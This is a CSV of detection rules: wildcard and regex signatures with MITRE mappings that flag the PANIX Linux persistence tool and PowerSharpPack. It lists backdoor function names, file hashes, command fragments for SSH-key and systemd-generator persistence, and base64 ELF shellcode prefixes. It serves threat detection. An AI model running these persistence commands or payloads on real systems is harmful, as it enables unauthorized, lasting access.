"*[+] Systemd Generator persistence established!*",".{0,1000}\[\+\]\sSystemd\sGenerator\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] User * has been modified to have UID 0 (root privileges).*",".{0,1000}\[\+\]\sUser\s.{0,1000}\shas\sbeen\smodified\sto\shave\sUID\s0\s\(root\sprivileges\)\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] User persistence through the new * user established!*",".{0,1000}\[\+\]\sUser\spersistence\sthrough\sthe\snew\s.{0,1000}\suser\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*[+] XDG persistence established!*",".{0,1000}\[\+\]\sXDG\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning At persistence methods*",".{0,1000}\]\sCleaning\sAt\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Backdoor binaries persistence methods*",".{0,1000}\]\sCleaning\sBackdoor\sbinaries\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Bind shell persistence methods*",".{0,1000}\]\sCleaning\sBind\sshell\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Cron persistence methods*",".{0,1000}\]\sCleaning\sCron\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Docker persistence methods*",".{0,1000}\]\sCleaning\sDocker\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Git persistence methods*",".{0,1000}\]\sCleaning\sGit\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning initd persistence methods*",".{0,1000}\]\sCleaning\sinitd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Malicious package persistence methods*",".{0,1000}\]\sCleaning\sMalicious\spackage\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning MOTD persistence methods*",".{0,1000}\]\sCleaning\sMOTD\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Package Managers persistence methods*",".{0,1000}\]\sCleaning\sPackage\sManagers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning rc.local persistence methods*",".{0,1000}\]\sCleaning\src\.local\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning setcap persistence methods*",".{0,1000}\]\sCleaning\ssetcap\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Setuid persistence methods*",".{0,1000}\]\sCleaning\sSetuid\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Shell profile persistence methods*",".{0,1000}\]\sCleaning\sShell\sprofile\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning SSH persistence methods*",".{0,1000}\]\sCleaning\sSSH\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Sudoers persistence methods*",".{0,1000}\]\sCleaning\sSudoers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Systemd Generator persistence methods*",".{0,1000}\]\sCleaning\sSystemd\sGenerator\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning Systemd persistence methods*",".{0,1000}\]\sCleaning\sSystemd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning udev persistence methods*",".{0,1000}\]\sCleaning\sudev\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*] Cleaning XDG persistence methods*",".{0,1000}\]\sCleaning\sXDG\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535*",".{0,1000}7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389*",".{0,1000}8c842d7dfb5c081a394e645377db303da5228ee78ff9467c4f00534ba8e0c389.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696*",".{0,1000}974cf826367e6b3bd96006f325a549d892da924bf76afc7df546e31ede536696.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*add_malicious_pager*",".{0,1000}add_malicious_pager.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*add_malicious_pre_commit*",".{0,1000}add_malicious_pre_commit.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*Aegrah/PANIX*",".{0,1000}Aegrah\/PANIX.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","1","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f*",".{0,1000}c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*cat *.pub >> */authorized_keys*",".{0,1000}cat\s.{0,1000}\.pub\s\>\>\s.{0,1000}\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*cat <<-EOF > /usr/lib/systemd/system-generators/generator*",".{0,1000}cat\s\<\<\-EOF\s\>\s\/usr\/lib\/systemd\/system\-generators\/generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*chmod +x /usr/lib/systemd/system-generators/makecon*",".{0,1000}chmod\s\+x\s\/usr\/lib\/systemd\/system\-generators\/makecon.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*echo ""@RFGroenewoud""*",".{0,1000}echo\s\""\@RFGroenewoud\"".{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5*",".{0,1000}f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP*",".{0,1000}f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*Invoke-Thunderfox*",".{0,1000}Invoke\-Thunderfox.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","#base64 #linux","N/A","10","10","1538","306","2024-06-13T10:33:45Z","2020-04-06T16:34:52Z"
"*ln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service*",".{0,1000}ln\s\-s\s\/run\/systemd\/system\/generator\.service\s\/run\/systemd\/system\/multi\-user\.target\.wants\/generator\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_backdoor_user*",".{0,1000}setup_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_cap_backdoor*",".{0,1000}setup_cap_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_generator_persistence*",".{0,1000}setup_generator_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_git_persistence*",".{0,1000}setup_git_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_initd_backdoor*",".{0,1000}setup_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_malicious_docker_container*",".{0,1000}setup_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_malicious_package*",".{0,1000}setup_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_motd_backdoor*",".{0,1000}setup_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_rc_local_backdoor*",".{0,1000}setup_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_sudoers_backdoor*",".{0,1000}setup_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_suid_backdoor*",".{0,1000}setup_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*setup_system_binary_backdoor*",".{0,1000}setup_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
